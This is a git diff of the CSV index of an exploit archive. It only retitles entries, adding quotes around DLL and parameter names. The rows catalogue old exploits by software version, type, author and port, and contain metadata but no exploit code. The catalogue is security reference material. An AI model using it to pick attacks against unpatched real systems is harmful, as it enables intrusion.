diff --git a/files.csv b/files.csv index 5818885d3..fc3186237 100755 --- a/files.csv +++ b/files.csv @@ -41,7 +41,7 @@ id,file,description,date,author,platform,type,port 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25 -43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - (mod_sql) SQL Injection",2003-06-19,Spaine,linux,remote,21 +43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25 @@ -114,14 +114,14 @@ id,file,description,date,author,platform,type,port 115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135 -118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 +118,platforms/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 120,platforms/linux/local/120.c,"TerminatorX 3.81 - Stack Overflow Privilege Escalation",2003-11-13,Li0n7,linux,local,0 -121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 +121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 -124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 -125,platforms/bsd/local/125.c,"OpenBSD 2.x < 3.3 - exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 +124,platforms/windows/remote/124.pl,"IA WebMail 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 +125,platforms/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation (PoC)",2003-12-02,"Christophe Devine",linux,local,0 @@ -157,7 +157,7 @@ id,file,description,date,author,platform,type,port 160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2)",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow",2004-03-04,"Luigi Auriemma",windows,dos,0 163,platforms/windows/remote/163.pl,"Eudora 6.0.3 (Windows) - Attachment Spoofing Exploit",2004-03-19,anonymous,windows,remote,0 -164,platforms/windows/remote/164.c,"Foxmail 5.0 - PunyLib.dll Remote Stack Overflow",2004-03-23,xfocus,windows,remote,0 +164,platforms/windows/remote/164.c,"Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow",2004-03-23,xfocus,windows,remote,0 165,platforms/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21 166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80 167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 @@ -275,9 +275,9 @@ id,file,description,date,author,platform,type,port 289,platforms/cgi/webapps/289.pl,"sendtemp.pl - Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 - LD_PRELOAD Local Exploit",2001-03-04,Shadow,linux,local,0 291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 -293,platforms/windows/remote/293.c,"Microsoft Windows - Lsasrv.dll RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 +293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000 -295,platforms/windows/remote/295.c,"Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 +295,platforms/windows/remote/295.c,"Microsoft Windows 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow",2004-05-05,vade79,linux,remote,0 297,platforms/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,windows,remote,5554 298,platforms/windows/dos/298.pl,"Emule 0.42e - Remote Denial of Service",2004-05-16,"Rafel Ivgi",windows,dos,80 @@ -504,7 +504,7 @@ id,file,description,date,author,platform,type,port 651,platforms/windows/dos/651.c,"Halo 1.05 - Broadcast Client Crash",2004-11-22,"Luigi Auriemma",windows,dos,0 652,platforms/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow",2004-11-23,"Serkan Akpolat",linux,remote,8080 653,platforms/windows/dos/653.c,"Soldier of Fortune II 1.3 Server/Client - Denial of Service",2004-11-23,"Luigi Auriemma",windows,dos,0 -654,platforms/windows/remote/654.c,"Winamp 5.06 - IN_CDDA.dll Remote Buffer Overflow",2004-11-24,k-otik,windows,remote,0 +654,platforms/windows/remote/654.c,"Winamp 5.06 - 'IN_CDDA.dll' Remote Buffer Overflow",2004-11-24,k-otik,windows,remote,0 655,platforms/windows/dos/655.c,"Star Wars Battlefront 1.1 - Fake Players Denial of Service",2004-11-24,"Luigi Auriemma",windows,dos,0 657,platforms/linux/local/657.c,"atari800 - Privilege Escalation",2004-11-25,pi3,linux,local,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,windows,remote,143 @@ -748,7 +748,7 @@ id,file,description,date,author,platform,type,port 926,platforms/linux/local/926.c,"Linux Kernel 2.4.x / 2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (3)",2005-10-26,qobaiashi,linux,local,0 927,platforms/windows/local/927.c,"Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow",2005-04-11,"Stuart Pearson",windows,local,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - (change_email) SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0 -929,platforms/windows/local/929.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (1)",2005-04-12,"Tal Zeltzer",windows,local,0 +929,platforms/windows/local/929.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell Exploit (1)",2005-04-12,"Tal Zeltzer",windows,local,0 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption",2005-04-12,Skylined,windows,remote,0 931,platforms/windows/dos/931.html,"Microsoft Internet Explorer - DHTML Object Handling Vulnerabilities (MS05-020)",2005-04-12,Skylined,windows,dos,0 932,platforms/windows/local/932.sql,"Oracle Database Server 10.1.0.2 - Buffer Overflow",2005-04-13,"Esteban Fayo",windows,local,0 @@ -770,7 +770,7 @@ id,file,description,date,author,platform,type,port 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service",2005-04-20,houseofdabus,multiple,dos,0 949,platforms/windows/remote/949.c,"PMsoftware Simple Web Server 1.0 - Remote Stack Overflow",2005-04-20,c0d3r,windows,remote,80 950,platforms/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow",2005-04-21,sk,linux,local,0 -951,platforms/windows/local/951.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (2)",2005-04-22,"Jean Luc",windows,local,0 +951,platforms/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell Exploit (2)",2005-04-22,"Jean Luc",windows,local,0 952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional - https Remote Buffer Overflow",2005-04-25,CorryL,windows,remote,8080 953,platforms/windows/remote/953.c,"Yager 5.24 - Remote Buffer Overflow",2005-04-25,cybertronic,windows,remote,1089 954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0 @@ -947,7 +947,7 @@ id,file,description,date,author,platform,type,port 1140,platforms/php/webapps/1140.php,"Flatnuke 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 1142,platforms/php/webapps/1142.php,"WordPress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,php,webapps,0 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0 -1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 +1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 1145,platforms/php/webapps/1145.pm,"WordPress 1.5.1.3 - Remote Code Execution (Metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,anonymous,windows,remote,10000 @@ -1158,10 +1158,10 @@ id,file,description,date,author,platform,type,port 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter SQL Injection",2005-12-23,krasza,php,webapps,0 1387,platforms/php/webapps/1387.php,"Dev Web Management System 1.5 - (cat) SQL Injection",2005-12-24,rgod,php,webapps,0 1388,platforms/php/webapps/1388.pl,"phpBB 2.0.17 - (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 -1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - (mshtml.dll datasrc) Denial of Service",2005-12-27,BuHa,windows,dos,0 +1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0 1391,platforms/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",windows,remote,0 -1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - (mshtml.dll div) Denial of Service",2005-12-29,rgod,windows,dos,0 +1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0 1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service (cpp)",2005-12-29,Lympex,windows,dos,0 1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation",2005-12-30,alert7,linux,local,0 @@ -1221,7 +1221,7 @@ id,file,description,date,author,platform,type,port 1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - (Reset Display) Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos,0 1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit)",2006-02-07,"H D Moore",linux,remote,0 -1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - (urlmon.dll) Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 +1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - 'urlmon.dll' Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Privilege Escalation",2006-02-08,kokanin,qnx,local,0 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - (OSX) location.QueryInterface() Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 @@ -1254,7 +1254,7 @@ id,file,description,date,author,platform,type,port 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - (rollid) SQL Injection",2006-02-17,RusH,php,webapps,0 1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution",2006-02-17,RusH,php,webapps,0 1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 -1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - (x-forwarded-for) Remote Command Execution",2006-02-19,rgod,php,webapps,0 +1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0 1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0 1514,platforms/asp/webapps/1514.pl,"MiniNuke 1.8.2b - (pages.asp) SQL Injection",2006-02-19,nukedx,asp,webapps,0 1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 @@ -1339,13 +1339,13 @@ id,file,description,date,author,platform,type,port 1595,platforms/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) - Privilege Escalation",2006-03-20,"H D Moore",linux,local,0 1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - (downloadid) SQL Injection",2006-03-20,nukedx,asp,webapps,0 -1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - (script action handlers) (mshtml.dll) Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 +1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - (script action handlers) 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0 1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - (images.php) Remote Code Execution",2006-03-21,x128,php,webapps,0 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - (COM Components) Remote Crash",2006-03-22,"Debasis Mohanty",windows,dos,0 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000 1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 -1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 +1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",windows,dos,0 1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution",2006-03-22,rgod,php,webapps,0 1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution",2006-03-23,darkeagle,windows,remote,0 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0 @@ -1374,7 +1374,7 @@ id,file,description,date,author,platform,type,port 1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - (vwar_root2) Remote File Inclusion",2006-04-01,uid0,php,webapps,0 1631,platforms/php/webapps/1631.php,"ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution",2006-04-02,rgod,php,webapps,0 1632,platforms/php/webapps/1632.pl,"VWar 1.5.0 R12 - Remote File Inclusion",2006-04-02,uid0,php,webapps,0 -1633,platforms/windows/dos/1633.c,"Total Commander 6.x - (unacev2.dll) Buffer Overflow (PoC)",2006-04-02,darkeagle,windows,dos,0 +1633,platforms/windows/dos/1633.c,"Total Commander 6.x - 'unacev2.dll' Buffer Overflow (PoC)",2006-04-02,darkeagle,windows,dos,0 1634,platforms/linux/dos/1634.pl,"mpg123 0.59r Malformed mp3 - (SIGSEGV) (PoC)",2006-04-02,nitr0us,linux,dos,0 1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 - (installpath) Remote File Inclusion",2006-04-04,K-159,php,webapps,0 1641,platforms/linux/dos/1641.pl,"Libxine 1.14 - MPEG Stream Buffer Overflow (PoC)",2006-04-04,"Federico L. Bossi Bonin",linux,dos,0 @@ -1438,7 +1438,7 @@ id,file,description,date,author,platform,type,port 1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - (function/showprofile.php) SQL Injection",2006-04-24,Devil-00,php,webapps,0 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - (member.asp) SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 1715,platforms/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service (PoC)",2006-04-24,"Yannick von Arx",osx,dos,0 -1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service (PoC)",2006-04-24,splices,multiple,dos,0 +1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - 'js320.dll/xpcom_core.dll' Denial of Service (PoC)",2006-04-24,splices,multiple,dos,0 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer - 'parser.exe' Denial of Service",2006-04-26,sh4d0wman,hardware,dos,0 1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 @@ -1452,9 +1452,9 @@ id,file,description,date,author,platform,type,port 1727,platforms/php/webapps/1727.txt,"openPHPNuke 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - (phpBB) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1729,platforms/php/webapps/1729.txt,"Limbo CMS 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 -1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0 +1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion",2006-04-30,[Oo],php,webapps,0 1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0 -1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion",2006-04-30,cijfer,php,webapps,0 +1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0 1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0 1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - (parse_xml.cgi) Code Execution",2003-02-24,FOX_MULDER,osx,remote,0 @@ -1479,7 +1479,7 @@ id,file,description,date,author,platform,type,port 1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) SQL Injection",2006-05-06,tracewar,asp,webapps,0 1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0 1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0 -1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 +1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0 1765,platforms/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - (authldap.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0 1766,platforms/php/webapps/1766.pl,"Claroline E-Learning 1.75 - (ldap.inc.php) Remote File Inclusion",2006-05-08,beford,php,webapps,0 @@ -1634,7 +1634,7 @@ id,file,description,date,author,platform,type,port 1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0 1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0 1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0 -1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - (ipath) Remote File Inclusion",2006-06-17,Basti,php,webapps,0 +1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0 1925,platforms/php/webapps/1925.txt,"INDEXU 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 @@ -2132,7 +2132,7 @@ id,file,description,date,author,platform,type,port 2433,platforms/php/webapps/2433.txt,"BrudaGB 1.1 - (admin/index.php) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - (fs_form_links.php) File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2435,platforms/php/webapps/2435.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (1)",2006-09-26,ThE-WoLf-KsA,php,webapps,0 -2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - (menu.php) Remote File Inclusion",2006-09-26,Drago84,php,webapps,0 +2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - 'menu.php' Remote File Inclusion",2006-09-26,Drago84,php,webapps,0 2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 @@ -2391,7 +2391,7 @@ id,file,description,date,author,platform,type,port 2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0 2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - (acp.php) Remote Code Execution",2006-11-01,Kacper,php,webapps,0 -2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 +2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - 'admin/configuration.inc.php' Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure",2006-11-01,securfrog,php,webapps,0 @@ -2513,7 +2513,7 @@ id,file,description,date,author,platform,type,port 2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - (index.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - (index1.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - (default2.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 -2831,platforms/php/webapps/2831.txt,"a-ConMan 3.2b - (common.inc.php) Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0 +2831,platforms/php/webapps/2831.txt,"a-ConMan 3.2b - 'common.inc.php' Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0 2832,platforms/php/webapps/2832.txt,"Messagerie Locale - 'centre.php' Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 2833,platforms/php/webapps/2833.txt,"Site News - 'centre.php' Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 2834,platforms/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 - SQL Injection",2006-11-23,GregStar,php,webapps,0 @@ -2707,7 +2707,7 @@ id,file,description,date,author,platform,type,port 3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusion",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 3029,platforms/php/webapps/3029.php,"Cacti 0.8.6i - cmd.php popen() Remote Injection",2006-12-27,rgod,php,webapps,0 -3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service",2006-12-28,shinnai,windows,dos,0 +3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 'ierpplug.dll' Internet Explorer 7 - Denial of Service",2006-12-28,shinnai,windows,dos,0 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) SQL Injection",2006-12-28,ajann,asp,webapps,0 3032,platforms/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) 